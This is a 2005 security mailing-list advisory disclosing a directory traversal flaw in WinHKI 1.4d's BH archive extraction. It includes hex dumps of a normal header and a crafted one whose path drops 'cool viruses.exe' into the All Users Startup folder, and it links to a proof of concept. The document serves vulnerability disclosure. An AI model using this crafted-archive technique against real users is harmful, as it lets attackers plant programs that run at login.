[VulnWatch] WinHKI - BH File Directory Transversal

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/06/05

  • Next message: Rafel Ivgi, The-Insider: "[VulnWatch] WinHKI - CAB File Directory Transversal"
    Date: Thu, 06 Jan 2005 10:19:50 +0200
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, Windows NTBugtraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, vulnwatch@vulnwatch.org, news@securiteam.com, "securitytracker.com" <bugs@securitytracker.com>
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: WinHKI
    Vendors: http://www.webtoolmaster.com
    Versions: 1.4d
    Platforms: Windows
    Bug: BH File Directory Transversal
    Exploitation: Local (extract file)
    Date: 24 Dec 2004
    Author: Rafel Ivgi, The-Insider
    E-Mail: the_insider@mail.com
    Website: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    WinHKI is a file archiever which supports: BH, CAB, HKI, JAR, LHA,TAR, GZ
    compressions.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    This is a normal BH compressed file header

    00000000 484B 4901 1441 0000 FD00 3973 7831 8D34 HKI..A....9sx1.4
    00000010 3741 7800 0000 1B00 0000 0500 0000 302E 7Ax...........0.
    00000020 6874 6D00 0010 0078 0000 001B 0000 008D htm....x........
    00000030 3437 4101 0000 0001 06FF FF00 0000 0000 47A.............

    in the following code, we can see how easy it is to change the path
    to anywhere we want, including the all users start up folder.

    00000000 484B 4901 1441 0000 FD00 6C8C 9031 066A HKI..A....l..1.j
    00000010 8E05 F600 0000 D300 0000 4000 0000 633A ..........@...c:
    00000020 5C64 6F63 756D 657E 315C 616C 6C75 7365 \docume~1\alluse
    00000030 7E31 5C73 7461 7274 6D7E 315C 7072 6F67 ~1\startm~1\prog
    00000040 7261 6D73 5C73 7461 7274 7570 5C63 6F6F rams\startup\coo
    00000050 6C20 2076 6972 7573 6573 2E65 7865 0000 l viruses.exe..
    00000060 1000 F600 0000 D300 0000 066A 8E05 0100 ...........j....

    All we need to do is cab compress (using WinHKI) a file with a long
    name/path and change the path specified inside the file to whatever
    we want Using any Hex editor such as HexWorkshop, just add anything
    to the filename.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    An online proof of concept can be found at:
    http://theinsider.deep-ice.com/poc.bh

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com

    "Scripts and Codes will make me D.O.S , but they will never HACK me."


  • Next message: Rafel Ivgi, The-Insider: "[VulnWatch] WinHKI - CAB File Directory Transversal"

    Relevant Pages